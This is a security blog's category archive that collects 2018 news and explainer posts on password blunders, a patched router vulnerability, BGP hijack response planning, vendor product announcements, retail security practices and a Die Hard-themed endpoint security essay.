Category Archives: Network Security

I Miss The 000000ld Kanye: West Tops Dashlane’s List of 2018’s “Worst Password Offenders”.

Dashlane today announced its third annual list of the “Worst Password Offenders.” The list highlights the high-profile individuals and organizations that had the most significant password-related blunders in 2018.

“Passwords are the first line of defense against cyberattacks,” said Emmanuel Schalit, CEO of Dashlane. “Weak passwords, reused passwords, and poor organizational password management can easily put sensitive information as risk.”

Dashlane found that the average internet user has over 200 digital accounts that require passwords, and the company projects this figure to double to 400 in the next five years. “The sheer number of accounts requiring passwords means everyone is prone to make the same mistakes as the Password Offenders,” states Schalit. “We hope our list serves as a wake-up call to everyone to follow the best password security practices.”

Dashlane’s “Worst Password Offenders” of 2018, beginning with the worst:

Kanye West: Kanye is no stranger to controversy and attained even more notoriety this year when he was captured unlocking his iPhone with the passcode “000000” during his infamous meeting at the White House. Having a weak passcode is risky enough, but brazenly flaunting poor password practices in a room full of TV cameras is as bad as it gets. To put it gently, Kanye needs to lockdown his passwords and make them better, faster, stronger.

The Pentagon: It’s a shame that the Department of Defense holds the #2 spot this year (up two spots from #4 in last year’s list), but a devastating audit by the Government Accountability Office (GAO) found numerous cybersecurity vulnerabilities in several of the Pentagon’s systems. Among the disturbing issues was that a GAO audit team was able to guess admin passwords in just nine seconds, as well as the discovery that software for multiple weapons systems was protected by default passwords that any member of the public could have found through a basic Google search.

Cryptocurrency owners: As the value of cryptocurrencies reached record levels at the beginning of the year, scores of crypto owners had the potential to cash out—if they could remember their passwords. The news cycle was rife with reports of people resorting to desperate measures (including hiring hypnotists) to attempt to recover/remember the forgotten passwords to their digital wallets.

Nutella: Nutella came under fire for giving some of the nuttiest password advice of the year as the beloved hazelnut-and-chocolate spread company encouraged its Twitter followers to use “Nutella” as their password. As if the advice wasn’t bad enough, the company sent out the ill-advised tweet to celebrate World Password Day.

U.K. Law Firms: Researchers in the United Kingdom found over one million corporate email and password combinations from 500 of the country’s top law firms available on the dark web. Making matters worse, most of the credentials were stored in plaintext.

Texas: Everything is bigger in Texas, including the cybersecurity gaffes. The Lone Star State left over 14 million voter records exposed on a server that wasn’t password protected. This blunder meant that sensitive personal information from 77% of the state’s registered voters, including addresses and voter history, was left vulnerable.

White House Staff: Last year, two White House officials made our list: President Trump took the (un)coveted title of 2017’s Worst Password Offender for a variety of poor cybersecurity habits, while Sean Spicer was included for tweeting his password. This year they passed the baton to another staffer who made the mistake of writing down his email login and password on official White House stationery. This mistake was exacerbated as he accidentally left the document at a Washington, D.C. bus stop.

Google: The search engine giant has historically been buttoned up in terms of cybersecurity, but this year, an engineering student from Kerala, India hacked one of their pages and got access to a TV broadcast satellite. The student didn’t even need to guess or hack credentials; he logged in to the Google admin pages on his mobile device in using a blank username and password.

United Nations: The organization tasked with maintaining international peace has a security problem. U.N. staff were using Trello, Jira, and Google Docs to collaborate on projects, but forgot to password protect many of their documents. This meant anyone with the correct link could access secret plans, international communications, and plaintext passwords.

University of Cambridge: A plaintext password left on GitHub allowed anyone to access the data of millions of people being studied by the university’s researchers. The data was being extracted from the Facebook quiz app myPersonality and contained the personal details of Facebook users, including intimate answers to psychological tests.

Learn from the mistakes of this year’s Password Offenders:

1. Password protect all accounts: Whether it’s a server, email account, or an app, you should always secure your data with passwords as they’re the first, and often only, line of defense between hackers and your personal information.

2. Use strong passwords: Never use passwords that are easy to guess or that contain names, proper nouns, or things people can easily research about you—like your favorite hazelnut spread! All your passwords should be longer than eight characters and include a mix of random letters, numbers, and symbols. Even better, use a password generator to come up with them for you.

3. Never reuse passwords: Every one of your accounts needs a unique password. The risk in password reuse is that hackers can use passwords from compromised accounts to easily access other accounts. The only protection against this is to have a different password for every account.

About Dashlane

Dashlane simplifies and secures your digital identity—all your personal information that lives online. Across all platforms and devices, the intuitive Dashlane app automatically fills and stores passwords, personal data, and payment details to help you manage, monitor, and protect your digital identity. Available in 11 languages and trusted by 10+ million people in 180 countries (and growing), it’s the complete, global solution for living safely and seamlessly online—at home, at work, and everywhere in between.

With offices in New York City, Paris, and Lisbon, Dashlane has raised over $70 million in venture funding to create a safe and effortless solution for all citizens of the digital world. Learn more at dashlane.com.

The post I Miss The 000000ld Kanye: West Tops Dashlane’s List of 2018’s “Worst Password Offenders”. appeared first on IT Security Guru.

Virgin Media Fixes Super Hub 3.0 Security Flaws.

Virgin Media has fixed multiple vulnerabilities in its Super Hub 3.0 broadband modem, after a researcher from global cyber security and risk mitigation expert, NCC Group, proved that they could enable hackers to remotely monitor network traffic and execute commands on the devices.

The firmware security flaws in a third party router, were discovered and disclosed to Virgin Media by Balazs Bucsay, managing security consultant at NCC Group, in 2017.

Bucsay was able to chain vulnerabilities together to create a remote exploit that could be actioned with no authentication from the Super Hub 3.0 owner.

By embedding the exploit in webpages and sending them to users via spear phishing emails, hackers could have controlled and installed backdoors in millions of modems, potentially giving them access to users’ internal home networks.

The vulnerabilities were located in multiple parts of the Super Hub 3.0’s firmware, including different services and additional web-related files.

By taking advantage of three different static cookies within the firmware’s web service binary, Bucsay was able to bypass its authentication and authorisation procedures and access all functionality of the device with administrator privileges.

Commenting on the research, Balazs Bucsay said: “This discovery should alert other internet service providers to the importance of checking and upgrading the security of any third- party hardware they use.

“Vendors often supply the same firmware with small modifications to white label the product for different customers.

“Virgin Media should be praised for taking these vulnerabilities seriously in order to protect their customers, and its vital that other providers follow their lead by upgrading their firmware.”

NCC Group responsibly disclosed the Super Hub vulnerabilities to Virgin Media in March 2017, after carrying out dedicated research to find them during the winter of 2016-2017. After working with NCC Group to fix the reported issues, Virgin Media rolled out a new firmware (version 9.1.116.608) in July 2018.

A detailed description of the research can be found in this blog.

The post Virgin Media Fixes Super Hub 3.0 Security Flaws. appeared first on IT Security Guru.

BT To Deliver The Latest SD-WAN And Cyber Security Service For IXOM.

BT today announced that it has signed a contract to deploy a new generation of network technology for IXOM, a market leader in chemicals manufacturing and distribution in Australia and New Zealand. It will see IXOM benefit from BT’s latest software-defined wide area networking (SD-WAN) and cyber security managed services as it shifts applications and data to the cloud to drive agility, efficiency and innovation.

IXOM’s new network will connect over 1000 employees at 55 sites across 14 countries. It will support the company’s digital transformation by delivering over seven times more bandwidth than its existing infrastructure and offer a step change in resilience with dual connectivity to 35 major sites.

It will be built around BT Agile Connect, a BT managed service based on an SD-WAN 2.0 solution by Nuage Networks from Nokia. This offers enhanced control and understanding of network infrastructure and traffic flows, a much faster, simpler and more secure way of setting up new sites, reduced complexity and lower costs.

BT will also deliver a 24×7 global cyber threat detection, investigation and response service. Managed from BT’s Australian Cyber Security Operation Centre and interfacing directly with IXOM’s in-house team, it will be based on a market-leading security information and event management (SIEM) platform combined with specialist cyber analyst services. This will help protect IXOM from rapidly evolving threats.

Rowan Start, head of IT for IXOM, said: “We are creating a resilient and agile technology environment to support our cloud applications and services. It will come with the ability to detect and respond to cyber threats in near real time. We chose BT because of its deep expertise in networking, understanding of our unique operational environment and its ability to seamlessly integrate security services with our own team to create a true partnership model.”

Bernadette Wightman, managing director, resources, manufacturing and logistics, BT said: “Managing risk is a key consideration of any digital transformation programme. That’s why companies such as IXOM look to trusted partners such as BT who can help them securely introduce the latest cloud-optimised network technologies. IXOM will benefit not only from the improved agility and control that our SD-WAN managed services offer but also the reassurance that they’re working with one of the world’s leading cyber security practices. It’s a superb example of how our Dynamic Network Services programme is helping customers deliver their digital transformation.”

BT’s Dynamic Network Services programme is designed to give customers more choice, security, resilience, service and agility in the roll-out of future networks that support digital transformation. The programme helps customers remove barriers to adoption of SD-WAN and NFV by answering questions about which technologies to use as well as when and how to implement, configure and integrate them with existing networks to create a hybrid infrastructure fit for the digital age.

The post BT To Deliver The Latest SD-WAN And Cyber Security Service For IXOM. appeared first on IT Security Guru.

Why You Need a BGP Hijack Response Plan

The vast majority of computer security incidents involve some sort of phishing or malware. Typically, this is the type of incident that receives the most attention from organizations, and for which security controls are established. And rightfully so — malware that exploits a vulnerability or human error can cause significant damage to an organization.

However, attacks targeting an organization’s network or internet infrastructure components — such as Border Gateway Protocol (BGP) — have been generally overlooked, even as they gain traction. BGP hijack attacks are still far less common than distributed denial-of-service (DDoS) attacks, but several recent events have turned this unusual method into headlines.

What Is BGP?

Some consider BGP the glue that ties the internet together. Purists might argue that it is the Domain Name System (DNS) that plays this role, given that there can be glue records in a zone file. However, without BGP, your packets would not arrive at their intended destinations.

BGP is the routing protocol of the internet. It is used to determine the most efficient way to route data between independently operated networks, known as autonomous systems (AS). In technical terms, an AS is a collection of IP prefixes that are assigned an Autonomous System Number (ASN).

Put simply, BGP is the road map to the internet, whereas DNS is the phone book.

How BGP Routing Works

A BGP router uses a large table called the routing information base (RIB), which describes the networks it can reach and what the most efficient paths to these networks are. BGP peers are systems (or neighbors) from which the router receives information (networks or prefixes). These are configured manually.

Basically, BGP peers tell the router that it should process or include the information received by other manually entered peers. By combing the information coming from different peers, the router can then work out the most efficient path to a destination.

What Is BGP Hijacking?

In short, a BGP attack is a configuration of an edge router to announce prefixes that have not been legitimately assigned to it. If the injected announcement is more specific (meaning more efficient) than the legitimate one, then the traffic will be rerouted to the injected announcement. In this way, an attacker can broadcast false prefix announcements, polluting the routing table of all its connected peers.

Because of the propagation of routes through connected networks, if one peer includes the malicious information in its routing table, this information can be quickly propagated to other peers. Routing announcements are accepted almost without any validation, making a successful BGP hijack relatively easy.

There are two primary types of attacks: A complete hijack attack overtakes a specific IP prefix, whereas in a partial hijack, the attacker competes with the legitimate source by announcing the same prefix with the same efficiency.

There are also unintentional cases. Human error can cause the same effect as a BGP hijack attack. This is often referred to as a route leak.

Recognize the Impact

The most obvious impact of BGP hijacking is that packets do not take their most optimal route, slowing down users’ connections to the network.

Far worse, attackers can black hole an entire network, including the organization’s services, thus resulting in an outage resembling a DDoS attack. Similarly, attackers can censor certain sources of information by black holing specific networks.

The rerouting makes the attacker a middleman of the network flow — meaning he or she can eavesdrop on certain parts of the communication, or in some cases even alter the traffic. They can also redirect traffic from your customers or users to malicious sites pretending to be part of your network. This can result in the theft of information or credentials or delivery of malware that exploits weaknesses.

In addition, spammers can abuse the good reputation of your ASN to conduct spam runs. This can have a negative effect on your network if it gets blocked by spam filters.

Watch for a Secondary Attack

In some cases, the BGP hijack might not be the attacker’s final objective. The goal might be to steal credentials or divert your users to sources that could potentially exploit their systems.

During the incident response phase, it’s important to be aware of this possibility and try to gather as much material as possible that could help you analyze these attacks. Valuable data sources include passive DNS, Secure Sockets Layer (SSL) certificate history and full packet captures.

How to Detect a BGP Hijack

One of the problems with BGP attacks is that they do not always last very long, so by the time you know an attack is taking place, the situation can already be restored to normal. This stresses the importance of implementing monitoring tools and establishing an efficient alerting workflow.

Start by monitoring the BGP routes that relate to your AS. You can set up your own monitoring solutions, but you can just as well rely on publicly available sources, such as BGPMon and Oracle Dyn, to do the heavy lifting for you.

Build an Incident Response Plan

Proper reaction to a BGP hijack starts with an incident response plan. Unfortunately, this isn’t the type of incident for which you can set up a simple fallback solution or defensive security control. Nor is it one that you can easily detect.

That’s because BGP attacks take place outside the network of an organization. A well-conducted BGP hijack can intervene with traffic without your users ever noticing something was wrong. You might be able to convince your ISP to remove the false route or request it to convince its peers to drop these announcements.

For BGP hijack attacks, the containment, eradication and recovery phases of an incident response plan glue together. Because the route announcements will spread very quickly, containment might be a real challenge.

If you can’t free up the resources to develop a dedicated incident response plan, then you can reuse parts of your plan for combating DDoS attacks.

Be Prepared

Most organizations do not have their own ASN and must rely on the measures of their upstream internet service provider (ISP). But there are ways to prepare:

  • Understand which network providers your organization uses. Does it rely on one single network provider or multiple? An AS relation model can give you insight on this.
  • Once you have listed your network providers, reach out and ask them what precautions or response plans they have with regard to BGP security. You could start by asking for a high-level overview of the peering policy and what agreements toward protection they have in place.
  • Build good working communication channels with your network providers. Next to the normal abuse contact, these should also include escalation paths.
  • Establish out-of-band communication channels via another network provider. Use these channels to inform your customers in case of an attack. Possible options would be social media or a communication page hosted at a cloud provider (take into account phishing).

If you own an ASN, there are some additional measures to take:

  • Write down your peering policy and make sure everyone understands the BGP interconnection policy.
  • Implement the BGP-peering BCPs.
  • Review and implement the best practices from Mutually Agreed Norms for Routing Security (MANRS).
  • Specify an AS path. Be aware that this can quickly backfire since the intent of the system is to find the best path automatically. Introducing manual paths will weaken the system.
  • Limit the amount of prefixes that can be received to prevent being flooded with announcements.
  • Implement route filtering.
  • Filter bogons, the IP prefixes that should not be allowed on the internet.
  • Use a form of authentication before accepting announcements.
  • Implement BGP time to live (TTL) checks, rejecting updates from routers located further away from you.

If you want to exercise your plan, you can, for example, make use of a virtual machine (VM) with the option to load +500k BGP routes.

Consider Automated Response Tools

A key element in fighting BGP hijacking is accurate and fast detection that enables flexible and equally fast mitigation of these events. This is where the Automatic and Real-Time dEtection and MItigation System (ARTEMIS) can provide future help.

ARTEMIS, presented in a research paper by the Center for Applied Internet Data Analysis (CAIDA), is a self-operated and unified detection and mitigation approach based on control-plane monitoring. Although still in development, the project shows potential to help network providers address these attacks.

The last phase in incident response — learning lessons — calls for collecting the necessary information to update and improve your plan, especially for the preparation and detection phases. Review whether all the communication channels worked as expected, the escalation paths gave the expected results and you were able to detect the attack in time. The best response plan is prevention.

The post Why You Need a BGP Hijack Response Plan appeared first on Security Intelligence.

NeuVector Expands Kubernetes Security Solution With Release Of Containerd And CRI-O Run-Time Support.

NeuVector, the leader in Container Network Security, today announced containerd and CRI-O run-time support. The Kubernetes security company is unveiling these new additions to its platform at KubeCon + CloudNativeCon North America 2018, where NeuVector is participating as an exhibitor and conference sponsor. Attendees are invited to learn how customers use NeuVector – and get 1:1 demos of the platform’s new capabilities – at booth S/E24. KubeCon + CloudNativeCon North America 2018 takes place December 10-13 in Seattle.

Enterprises are increasingly taking advantage of Kubernetes throughout the entire application development process and into production. This is fueling an industry shift toward implementing robust security measures from the beginning of the development lifecycle all the way through to live containerized production environments. NeuVector’s solution is specifically designed to meet these critical requirements for fully integrated monitoring and security that protects container environments from external and internal security threats across the entire build-ship-run lifecycle. Successfully delivering its unique Kubernetes security solution has seen NeuVector’s customer base – from name-brand enterprises to emerging startups – grow 300% over the past year.

NeuVector is now making its multi-vector container firewall available to more security-conscious businesses by introducing support for containerd and CRI-O container run-time technologies. Containerd is an industry standard container run-time built to emphasize simplicity, robustness, and portability – while managing the complete container lifecycle of its host system. NeuVector, a “Built on IBM Cloud” partner, has been testing the containerd version on the latest IBM Cloud Kubernetes Service version, which uses the containerd run-time.

CRI-O is an implementation of the Kubernetes container run-time interface enabling OCI compatible run-times – essentially functioning as a lightweight alternative to Docker or other solutions as a run-time for Kubernetes, including Red Hat OpenShift. With this newly added support, organizations using containerd or CRI-O can now easily deploy NeuVector to secure their container environments from initial development all the way through production.

“As enterprise container strategies mature and increasingly move into production environments, we’re excited to further strengthen our Kubernetes security offering with today’s containerd and CRI-O run-time support releases – and KubeCon is the perfect venue to unveil these important additions,” said Gary Duan, CTO, NeuVector. “We invite attendees to come by to see how we can fit into their container security strategies throughout the entire application development lifecycle.”

“NeuVector is the strongest player in the nascent Kubernetes security market, giving us the ability to both monitor and visualize the network traffic we’re generating, plus a complete static analysis offering for our container base layers,” said Element’s Vice President of Engineering, Sean McCormick. “By using NeuVector’s end-to-end container security solution, I’m confident that we’re detecting attacks from both malicious containers containing injected vulnerabilities (which are becoming all too common these days) and from more traditional intrusion vectors. I sleep just a bit easier knowing these kinds of threats will be automatically detected and addressed. With NeuVector in our security quiver, we can confidently tell our customers that the Element Platform is secure against bad actors.”

The post NeuVector Expands Kubernetes Security Solution With Release Of Containerd And CRI-O Run-Time Support. appeared first on IT Security Guru.

Next-Generation Firewalls Are The Best Medicines For Your Network.

By Ronald Sens, EMEA Director for A10 Networks

As viruses become more sophisticated, malware must be detected all the way down to its DNA.

The winter season is peak time for infection and disease across the UK. But the old saying “prevention is better than cure“ is not only relevant to our personal health, but also to our networks and IT systems.

In corporate networks, the classic defence against malware and other external attacks is usually split-up between two solutions: a firewall and a traditional antivirus program. The firewall is similar to a gate that only allows authorised personnel into the network and the virus program is a guard capturing those who attempt to sneak in undetected.

Balancing act

The classic defence of using two solutions was put into place because neither solution alone could accurately protect the network. The two needed to work together in order to achieve maximum effect and coverage.

Traditional firewalls simply followed pre-determined web protocols and lacked the intelligence of next-generation firewalls. This means that the classic firewall lacked the ability to distinguish between different kinds of web traffic. The inability to distinguish between legitimate traffic and abnormal malicious traffic meant that firewalls either accepted or rejected all the traffic sent its way.
Enterprises needed a more robust form of security with newer, more complex, rules. This is why traditional antivirus programs were paired up with firewalls.

Antivirus software is reactive and while these programs can deal with a threat, they only do so once that threat has entered the network. Depending on the number of threats attacking simultaneously and the sophistication of the attack an antivirus program is not powerful enough to keep the network safe.

However, when paired with a firewall that prevents all traffic entering the network the antivirus has the chance to scan the traffic and identify it. The antivirus can distinguish between the good and the bad traffic and relay this information to the firewall so it can only let in the approved traffic. The system works but it is flawed. Time is wasted waiting for the antivirus to identify the traffic and inform the firewall, and if one of the two was to go down then the whole system crashes.

This kind of defence previously used to be enough, but as enterprise networks get more complex and as the types of external threats become more varied, having two separate solutions working together is just not sufficient.

Convergent Firewall – the impenetrable dome

The problem surrounding a two solution balancing act can be addressed by next-generation firewalls, and one in particular is the Convergent Firewall (CFW). The CFW intelligently recognises users who have permissions to prevent unauthorised attackers and malicious infiltrators from having access, and in some cases outright destroys the invader.

In order for CFW to be able to guarantee this comprehensive protection, an extensive amount of data and files are fed into the program in advance and broken down extensively. With the assistance of machine learning, the CFW is proof against all known malware and viruses, and can adapt to future threats. It can also distinguish between normal and abnormal behaviour from users within the network. This accurate analysis enables CFW to detect malware in real time using digital DNA and thereby prevent the majority of malicious attacks.

To understand why this strategy makes sense, it helps to think again about the approaching flu season. The CFW is less of a conventional doctor than a kind of super medicine that can scan people down to the molecular level. It does this in order to be able to judge exactly whether a disease is present, what symptoms are to be expected and how the disease can best be cured. It’s the perfect medicine for a network in the middle of the flu season.

The post Next-Generation Firewalls Are The Best Medicines For Your Network. appeared first on IT Security Guru.

5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays

This is the second article in a two-part series about retail cybersecurity during the holidays. Read part one for the full list of recommendations.

The holiday shopping season offers myriad opportunities for threat actors to exploit human nature and piggyback on the rush to buy and sell products in massive quantities online. Our previous post covered some network security basics for retailers. Let’s take a closer look at how retailers can properly configure and monitor their networks to help mitigate cyberattacks and provide customers with a safe shopping experience during the holiday season.

1. Take a Baseline Measurement of Your Network Traffic

Baselining is the process of measuring normal amounts of traffic over a period of days or even weeks to discern any suspicious traffic peaks or patterns that could reveal an evolving attack.

Network traffic measurements should be taken during regular business hours as well as after hours to cover the organization’s varying activity phases. As long as the initial baseline is taken during a period when traffic is normal, the data can be considered reliable. An intrusion detection system (IDS) or intrusion prevention system (IPS) can then assist with detecting abnormal traffic volumes — for example, when an intruder is exfiltrating large amounts of data when offices are closed.

Below are some factors to consider when performing a baseline measurement that could be helpful in detecting anomalies:

  • Baseline traffic on a regular basis.
  • Look for atypical traffic during both regular and irregular times (e.g., after hours).
  • Set alarms on an IDS/IPS for high and low thresholds to automate this process. Writing signatures specific to your company’s needs is a key element to an IDS/IPS working effectively and should be carried out by trained security specialists to avoid false alarms.
  • Investigate any discrepancies upon initial discovery and adjust thresholds accordingly.
  • Consider using an endpoint detection and response (EDR) solution to help security teams better identify threats, and to allow operations teams to remediate endpoints quickly and at scale.

Listen to the podcast: Examining the State of Retail Security

2. Run a Penetration Test Before It’s Too Late

A key preventative measure for retailers with a more mature security posture is running a penetration test. Simply put, the organization’s security team can allow a white hat hacker, or penetration tester, to manually try to compromise assets using the same tactics, techniques and procedures (TTPs) as criminal attackers. This is done to ascertain whether protections applied by the organization are indeed working as planned and to find any unknown vulnerabilities that could enable a criminal to compromise a high-value asset.

Manual testing should be performed in addition to automated scanning. Whereas automated tools can find known vulnerabilities, manual testing finds the unknown vulnerabilities that tools alone cannot find. Manual testing also targets the systems, pieces of information and vulnerabilities most appealing to an attacker, and specifically focuses on attempting to exploit not just technical vulnerabilities within a system, but business logic errors and other functionality that, when used improperly, can grant unintended access and/or expose sensitive data.

The key to a penetration test is to begin by assessing vulnerabilities and addressing as many of them as possible prior to the test. Then, after controls are in place, decide on the type of test to carry out. Will it be a black box test, where the testers receive no information about the target’s code and schematics? Or will it be a white box test, where organizations fully disclose information about the target to give the tester full knowledge of how the system or application is intended to work? Will it be in a very specific scope and only include customer-facing applications?

It can be helpful to scope a penetration test by taking the following three steps prior to launching the testing period:

  1. Establish goals for the testing. Since penetration testing is intended to simulate a real-world attack, consider scenarios that are relevant to your organization. Giving thought to what type of data is at risk or what type of attacker you’re trying to simulate will allow the testers to more closely approximate threats relevant to your organization.
  2. Draft a thorough contract to state the expectations and scope of the project. For example, if there are specific areas a penetration tester should not access based on criticality or sensitivity, such as production servers or credit card data, outline these points in the contract. Also, define whether the penetration testers should attempt to compromise both physical access and remote access to compromise networks, or if just one is preferred. Consider if you wish to have social engineering included within the test as well.
  3. Have the vendor and its employees sign nondisclosure agreements (NDAs) to keep their findings confidential and ensure their exclusive use by the organization.

Penetration testers from reputable companies are thoroughly vetted before being allowed to conduct these tests. The retail industry can benefit from this type of testing because it mimics the actions of a threat actor and can reveal specific weaknesses about an organization. It can even uncover deficiencies in staff training and operational procedures if social engineering is included within the scope of the testing.

3. Check Your Log Files for Anomalies

Log data collected by different systems throughout an organization is critical in investigating and responding to attacks. Bad actors know this and, if they manage to breach an organization and gain elevated privileges, will work to cover up their tracks by tampering with logs.

According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, one of the most common tactics malicious actors employ is post-intrusion log manipulation. In looking to keep their actions concealed, attackers will attempt to manipulate or delete entries, or inject fake entries, from log files. Compromising the integrity of security logs can delay defenders’ efforts to find out about malicious activity. Additional controls and log monitoring can help security teams avoid this situation.

Below are some helpful tips and examples of security logs that must be checked to determine whether anything is out of the ordinary.

  • Are your logs being tampered with? Look for altered timestamps, missing entries, additional or duplicate entries, and anomalous login attempts.
  • Transfer old log files to a restricted zone on your network. This can help preserve the data and create space for logs being generated overnight.
  • Use a security information and event management (SIEM) tool to assist with analyzing logs and identifying anomalies reported by your organization’s security controls.
  • To include as many sources of information as possible, plug in endpoint, server, network, transaction and security logs for analysis by a SIEM system. Look for red flags such as multiple failed logins, denied access to sensitive areas, ping sweeps, etc.

Knowing which logs to investigate is also critical to successful log analysis. For example, point-of-sale (POS) systems are often installed on Microsoft Windows or Linux systems. It is therefore critical to review operating system logs for these particular endpoints. When it comes to POS networks, where many of the devices are decentralized, daily usage, security and application logs are good places to look for anomalies.

For network security, use logs from network appliances to determine failed or excessive login attempts, increases or decreases in traffic flow, and unauthorized access by users with inadequate privilege levels.

4. Balance Your Network and Website Traffic

According to the National Retail Federation, online sales from November and December 2017 generated more than $138.4 billion, topping 2016 sales by 11.5 percent. This year is likely going to set its own record. With internet traffic volumes expected to be at their highest, online retailers that are unprepared could see the loss of sales and damaged reputation in the aftermath of the holiday season.

But preparing for extra shoppers is the least of retailers’ worries; attackers may take advantage of the festive time of year to extort money by launching distributed denial-of-service (DDoS) attacks against retail websites. These attacks work by flooding a website or network with more traffic than it can handle, causing it to cease accepting requests and stop responding.

To stay ahead of such attacks, online retailers can opt to use designated controls such as load balancers. Load balancers are an integral part of preventing DDoS attacks, which can affect POS systems storewide. With a well-coordinated DDoS attack, a malicious actor could shut down large parts of their target’s networks.

One best practice is to prepare before traffic peaks. Below are some additional tips for a more balanced holiday season.

  • Preventing a DDoS attack can be an imposing undertaking, but with a load balancing device, most of this work can be automated.
  • Load balancers can be either hardware devices or virtual balancers that work to distribute traffic as efficiently as possible and route it to the server or node that can best serve the customer at that given moment. In cases of high traffic, it may take several load balancers to do the work, so evaluate and balance accordingly.
  • Load balancers can be programmed to direct traffic to servers dedicated to customer-facing traffic. Using them can also enable you to move traffic to the proper location instead of inadvertently allowing access to forbidden areas.

Load balancers are typically employed by larger companies with a prominent web footprint. However, smaller companies should still consider employing them because they serve a multitude of purposes. Keeping the load on your servers balanced can help network and website activity run smoothly year-round and prevent DDoS attacks from doing serious damage to your organization’s operations or web presence.

5. Plan and Practice Your Incident Response Strategy

An incident response (IR) plan is essential to identifying and recovering from a security incident. Security incidents should be investigated until they have been classified as true or false positives. The more timely and coordinated an organization’s response is to an incident, the faster it can limit and manage the impact. A solid IR plan can help contain an incident rapidly and result in better protection of customer data, reduction of breach costs and preservation of the organization’s reputation.

If your enterprise does not have an IR plan, now is the time to create one. In the event that your enterprise already has a plan, take the time to get key stakeholders together to review it and ensure it is up-to-date. Most importantly, test and drill the plan and document its effectiveness so you’re prepared for the attack scenarios most relevant to your organization.

When evaluating an IR plan, consider the following tips to help accelerate your organization’s response time:

  • Threat actors who compromise retail cybersecurity will typically turn stolen data around quickly for a profit on the dark web. Use dark web search tools to look for customer data that may have been compromised. Sometimes, data can be identified by the vendor that lost it, leading to the detection of an ongoing attack.
  • Before an attack occurs, establish a dedicated IR team with members from different departments in the organization.
  • Make sure each team member knows his or her precise role in the case of an incident.
  • Keep escalation charts and runbooks readily available to responders, and make sure copies are available offline and duplicated in different physical locations.
  • Test your IR strategy under pressure in an immersive cyberattack simulation to find out where the team is strong and what may still need some fine-tuning.

Make Retail Cybersecurity a Year-Round Priority

Increased vigilance is important for retailers during the holiday season, but these network security basics and practices can, and should, be maintained throughout the year. Remember, attackers don’t just wait until the holiday season to strike. With year-round preparation, security teams can mitigate the majority of threats that come their way.

Read the latest IBM X-Force Research

The post 5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays appeared first on Security Intelligence.

Endpoint Management Missteps in the ‘Die Hard’ Franchise: Viewing a Holiday Favorite Through a Cybersecurity Lens

“Die Hard” is likely the greatest Christmas movie of all time — especially when viewed from an endpoint management perspective. Perhaps you prefer the classic “It’s a Wonderful Life” or, more controversially, “A Christmas Prince.” But it’s hard to argue with the fact that the 1988 heist movie starring Bruce Willis delivers some real thrills.

“Die Hard” has everything: a high-stakes hostage situation, four sequels and loads of snappy dialogue. Nothing inspires holiday cheer like full-screen explosions and a barefoot underdog hanging by his fingertips in an elevator shaft. And if you know what to look for, the films are also packed with Internet of Things (IoT) vulnerabilities, social engineering and user governance failures.

“Die Hard” was almost certainly created with the primary purpose of delivering pure VHS entertainment. However, it unintentionally explores some IT questions that are still relevant 30 years later, such as how to implement strong endpoint security — or how not to. A December marathon of all five “Die Hard” films makes for surprisingly valuable endpoint management research for contemporary cybersecurity professionals.

What Can ‘Die Hard’ Teach Us About Endpoint Management?

As the Nakatomi Corporation staff is celebrating on Dec. 24, the building security guard is shot by a team of terrorists. Within minutes, the sole hacker on the team, Theo, has used the security guard’s computer to commandeer rudimentary smart systems — elevators, doors and surveillance — to nearly steal $640 million in bearer bonds.

“Die Hard” wasn’t written for an audience of cybersecurity professionals 30 years in the future, and few details are given about the hacking methods used. Theo is portrayed as a one-dimensional character: an agreeable genius who can solve any puzzle in seconds, from escalating credentials to drilling vaults. When asked if he can do the impossible, he beams affirmatively at the lead terrorist Hans:

“You didn’t bring me along for my charming personality.”

Sure, it was the 1980s, but Nakatomi Corporation’s endpoint sins set the whole film in motion. If the security guard’s computer had been protected with stronger user authentication and the building’s smart systems were segregated, perhaps even hacking genius Theo couldn’t have launched a $640 million heist with a few clicks.

Fast-Forward to Today’s IoT Risks

In the 1990 sequel, “Die Harder,” a team led by a former special forces colonel William Stewart remotely hacks into the air traffic control system of Washington D.C.’s Dulles Airport. Stewart’s team turns off all airport lights and cuts in-flight communications. The fourth installment, 2007’s “Live Free or Die Hard,” features a financially motivated cyberattack on FBI financial databases. The same nefarious hackers later crack the communication systems of an F-35B Lightning II fighter jets and use social engineering tactics to impersonate a flight controller.

These plot twists are brought to you by the same IoT risks we face today in an increasingly smart and interconnected world. In late July, IBM X-Force presented research on four common smart city devices that revealed 17 security vulnerabilities, including nine critical flaws. The same week, researcher Ruben Santamarta shared vulnerabilities in the IoT global satellite communication system (SATCOM) that could potentially disable in-flight communications for commercial aircraft.

Unlike in 1990, IoT technology adoption is on the rise, and attacks are growing. According to a Ponemon Institute report titled “The Internet of Things (IoT): A New Era of Third-Party Risk,” 21 percent of organizations reported data breaches related to unsecured IoT devices this year, and cyberattacks involving IoT devices increased by 5 percent between 2017 and 2018.

The IoT security failures in the “Die Hard” franchise are, first and foremost, narrative tools. Had the company known how to implement stronger endpoint security, audiences wouldn’t be able enjoy hours of explosions and near-misses. Still, it is worth wondering why those IoT threats are more relevant today than the hairstyles sported by the franchise’s cast members.

There Are No Endpoint Management Miracles

“For many of us, Christmas films are as much a part of the psychological and emotional preparation for the season as mince pies and mulled wine,” wrote Natalie Haynes of the BBC. She argued that the formula that defines a great Christmas film is more complex than films designed to evoke heartwarming feelings.

One theme that unites many movies we return to each December is the idea of miracles — and the triumph of NYPD cop John McClane over many terrorists on Christmas Eve in Nakatomi Plaza is nothing short of miraculous.

While viewing the “Die Hard” franchise through an endpoint security lens is a strictly optional exercise, there’s value in considering how such an incredible movie could have ended in the first 30 minutes if the building had taken the time to implement stronger endpoint security. As it turns out, these decades-old exploits resemble vulnerabilities that persist in the enterprise today.

Trust-based authentication or biometrics, behavioral analytics, and embedded security for IoT devices could have allowed Bruce Willis’s heroic character to enjoy Christmas with his family instead of fighting evil in bare feet. But then we would’ve missed out on so many ageless one-liners.

“Now I have a machine gun, ho-ho-ho.”

The post Endpoint Management Missteps in the ‘Die Hard’ Franchise: Viewing a Holiday Favorite Through a Cybersecurity Lens appeared first on Security Intelligence.

Preventing Illness On Your Network With The Right Medicine.

By Ronald Sens, EMEA Director for A10 Networks

As viruses become more sophisticated, malware must be detected all the way down to its DNA.

The winter season is peak time for infection and disease across the UK. But the old saying “prevention is better than cure“ is not only relevant to our personal health, but also to our networks and IT systems.

